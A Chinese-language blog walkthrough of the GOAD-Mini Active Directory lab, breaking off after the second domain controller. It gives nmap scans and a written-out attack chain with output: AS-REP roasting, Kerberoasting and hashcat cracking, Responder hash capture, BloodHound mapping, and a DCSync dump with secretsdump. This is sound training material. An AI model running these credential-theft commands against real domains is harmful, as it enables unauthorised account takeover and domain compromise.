上图是官方给的整体结构。因为GOAD-Mini是最小的结构,我一开始以为攻击入口应该在DC01-kinslanding上面,于是先从DC01开始尝试。
DC01-192.168.0.10-First glance
Nmap result:
Nmap scan report for 192.168.0.10 Host is up (0.00047s latency). Not shown: 65506 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows Server | http-methods: |_ Potentially risky methods: TRACE 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-16 10:43:16Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2025-04-16T10:45:49+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local | Not valid before: 2025-04-03T17:48:34 |_Not valid after: 2026-04-03T17:48:34 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local | Not valid before: 2025-04-03T17:48:34 |_Not valid after: 2026-04-03T17:48:34 |_ssl-date: 2025-04-16T10:45:49+00:00; -2s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2025-04-16T10:45:48+00:00; -2s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local | Not valid before: 2025-04-03T17:48:34 |_Not valid after: 2026-04-03T17:48:34 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2025-04-16T10:45:49+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:kingslanding.sevenkingdoms.local | Not valid before: 2025-04-03T17:48:34 |_Not valid after: 2026-04-03T17:48:34 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2025-04-16T10:45:49+00:00; -1s from scanner time. | ssl-cert: Subject: commonName=kingslanding.sevenkingdoms.local | Not valid before: 2025-04-02T17:07:17 |_Not valid after: 2025-10-02T17:07:17 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_ssl-date: 2025-04-16T10:45:48+00:00; -2s from scanner time. |_http-server-header: Microsoft-HTTPAPI/2.0 | tls-alpn: |_ http/1.1 | ssl-cert: Subject: commonName=VAGRANT | Subject Alternative Name: DNS:VAGRANT, DNS:vagrant | Not valid before: 2025-04-02T09:14:47 |_Not valid after: 2028-04-01T09:14:47 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49671/tcp open msrpc Microsoft Windows RPC 49673/tcp open msrpc Microsoft Windows RPC 49676/tcp open msrpc Microsoft Windows RPC 49686/tcp open msrpc Microsoft Windows RPC 49698/tcp open msrpc Microsoft Windows RPC 49832/tcp open msrpc Microsoft Windows RPC MAC Address: 08:00:27:2A:66:20 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose Running: Microsoft Windows 2019 OS CPE: cpe:/o:microsoft:windows_server_2019 OS details: Microsoft Windows Server 2019 Network Distance: 1 hop Service Info: Host: KINGSLANDING; OS: Windows; CPE: cpe:/o:microsoft:windows
先看80/HTTP端口,是默认的IIS,用ffuf遍历一遍:
没什么可疑的,使用enum4linux也没找到什么有用的信息。
ldap也无法访问,需要用户名和密码。猜测可能开放udp端口,扫描一下:
sudo nmap -sU --top-ports 100 192.168.0.10 [sudo] password for kali: Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-16 23:09 AEST Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan UDP Scan Timing: About 19.78% done; ETC: 23:10 (0:01:09 remaining) Stats: 0:00:47 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan UDP Scan Timing: About 39.44% done; ETC: 23:11 (0:01:14 remaining) Stats: 0:01:45 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan UDP Scan Timing: About 74.33% done; ETC: 23:11 (0:00:37 remaining) Nmap scan report for 192.168.0.10 Host is up (0.00029s latency). Not shown: 92 closed udp ports (port-unreach) PORT STATE SERVICE 53/udp open domain 88/udp open kerberos-sec 123/udp open ntp 137/udp open netbios-ns 138/udp open|filtered netbios-dgm 500/udp open|filtered isakmp 4500/udp open|filtered nat-t-ike 5353/udp open|filtered zeroconf MAC Address: 08:00:27:2A:66:20 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
也没什么有用的信息。暂且搁置,去看其他的机器。
DC02--192.168.0.11
nmap result:
Nmap scan report for 192.168.0.11 Host is up (0.00046s latency). Not shown: 65508 closed tcp ports (reset) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-16 10:42:40Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local | Not valid before: 2025-04-03T18:34:38 |_Not valid after: 2026-04-03T18:34:38 |_ssl-date: 2025-04-16T10:45:36+00:00; -14s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local | Not valid before: 2025-04-03T18:34:38 |_Not valid after: 2026-04-03T18:34:38 |_ssl-date: 2025-04-16T10:45:36+00:00; -14s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) |_ssl-date: 2025-04-16T10:45:36+00:00; -15s from scanner time. | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local | Not valid before: 2025-04-03T18:34:38 |_Not valid after: 2026-04-03T18:34:38 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sevenkingdoms.local0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:winterfell.north.sevenkingdoms.local | Not valid before: 2025-04-03T18:34:38 |_Not valid after: 2026-04-03T18:34:38 |_ssl-date: 2025-04-16T10:45:36+00:00; -14s from scanner time. 3389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=winterfell.north.sevenkingdoms.local | Not valid before: 2025-04-02T17:30:27 |_Not valid after: 2025-10-02T17:30:27 |_ssl-date: 2025-04-16T10:45:36+00:00; -14s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 | ssl-cert: Subject: commonName=VAGRANT | Subject Alternative Name: DNS:VAGRANT, DNS:vagrant | Not valid before: 2025-04-02T09:20:49 |_Not valid after: 2028-04-01T09:20:49 | tls-alpn: |_ http/1.1 |_ssl-date: 2025-04-16T10:45:36+00:00; -15s from scanner time. 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49671/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49672/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49678/tcp open msrpc Microsoft Windows RPC 49701/tcp open msrpc Microsoft Windows RPC 49828/tcp open msrpc Microsoft Windows RPC MAC Address: 08:00:27:2C:77:94 (PCS Systemtechnik/Oracle VirtualBox virtual NIC) Device type: general purpose Running: Microsoft Windows 2019 OS CPE: cpe:/o:microsoft:windows_server_2019 OS details: Microsoft Windows Server 2019 Network Distance: 1 hop Service Info: Host: WINTERFELL; OS: Windows; CPE: cpe:/o:microsoft:windows
用enum4linux扫描:
这次扫描出很多信息,在samwell.tarly用户description下发现他的明文密码,先做记录。以及许多用户名
尝试用crackmapexec爆破smb和winrm服务但都失败。但我们有了一个用户列表后不用密码也可以用impacket-GetNPUsers 来进行AS-REP攻击:
获取brandon.stark用户的asrep-hash,使用hashcat尝试破解:
hashcat -m 18200 -a 0 brandon.hash /usr/share/wordlists/rockyou.txt $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL.......iseedeadpeople
爆破成功,获取密码brandon:iseedeadpeople
有了一个valid用户后就可以向AD请求服务器的SPN:
impacket-GetUserSPNs -dc-ip 192.168.0.11 north.sevenkingdoms.local/brandon.stark:iseedeadpeople -request Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation --------------------------------------------------- ----------- ---------------------------------------------------------- -------------------------- -------------------------- ----------- HTTP/eyrie.north.sevenkingdoms.local sansa.stark CN=Stark,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2025-04-04 10:07:09.378144 <never> CIFS/thewall.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2025-04-04 10:07:18.231081 <never> constrained HTTP/thewall.north.sevenkingdoms.local jon.snow CN=Night Watch,CN=Users,DC=north,DC=sevenkingdoms,DC=local 2025-04-04 10:07:18.231081 <never> constrained MSSQLSvc/castelblack.north.sevenkingdoms.local sql_svc 2025-04-04 10:07:24.810125 2025-04-04 10:27:56.458537 MSSQLSvc/castelblack.north.sevenkingdoms.local:1433 sql_svc 2025-04-04 10:07:24.810125 2025-04-04 10:27:56.458537 [-] CCache file is not found. Skipping... $krb5tgs$23$*sansa.stark$NORTH.SEVENKINGDOMS.LOCAL$..... $krb5tgs$23$*jon.snow$NORTH.SEVENKINGDOMS.LOCAL$..... $krb5tgs$23$*sql_svc$NORTH.SEVENKINGDOMS.LOCAL$.....
获得了三个服务的TGS,再次交给hashcat尝试破解:
hashcat -m 13100 -a 0 spnhashes /usr/share/wordlists/rockyou.txt jon.snow: iknownothing
只破解出一个jon.snow的密码:iknownothing。用所得的三个密码在smb winrm上尝试password spray--失败。
通过官方给的结构图可以得知,有bot模拟用户行为向DC02发送LLMNR query。打开responder尝试捕捉:
捕捉到robb.stark, eddard.stark的NTLMv2-hash,给hashcat尝试破解:
只成功了robb.stark: sexywolfy
有了valid domain user的身份信息后可以用bloodhound-python远程获取域结构:
bloodhound-python -u brandon.stark -p 'iseedeadpeople' -d north.sevenkingdoms.local -ns 192.168.0.11 -c All --zip INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3) INFO: Found AD domain: north.sevenkingdoms.local WARNING: Could not find a global catalog server, assuming the primary DC has this role If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc INFO: Getting TGT for user WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (winterfell.north.sevenkingdoms.local:88)] [Errno -2] Name or service not known INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local INFO: Found 1 domains INFO: Found 2 domains in the forest INFO: Found 2 computers INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local INFO: Found 17 users INFO: Found 51 groups INFO: Found 3 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 1 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: castelblack.north.sevenkingdoms.local INFO: Querying computer: winterfell.north.sevenkingdoms.local INFO: Done in 00M 00S INFO: Compressing output into 20250416232651_bloodhound.zip
打开bloodhound并导入数据, 然后看看我们已有的用户都有什么权限:
首先发现brandon.stark属于stark组,而此组内的成员可以RDP登录到DC02. 尝试登录:
xfreerdp3 /v:192.168.0.11 /u:brandon.stark /p:iseedeadpeople
登陆成功。随后发现robb.stark在本地Administrators组中:
这点在bloodhound上也可找到:
并且robb.stark对DC02有DCSync权限:
使用impacket-secretsdump来实施DCSync攻击,并dump本地hash:
impacket-secretsdump robb.stark:'sexywolfy'@192.168.0.11 -outputfile hashes
自此,获取了DC02上所有用户的hash。
先写到这里o.O
Comments NOTHING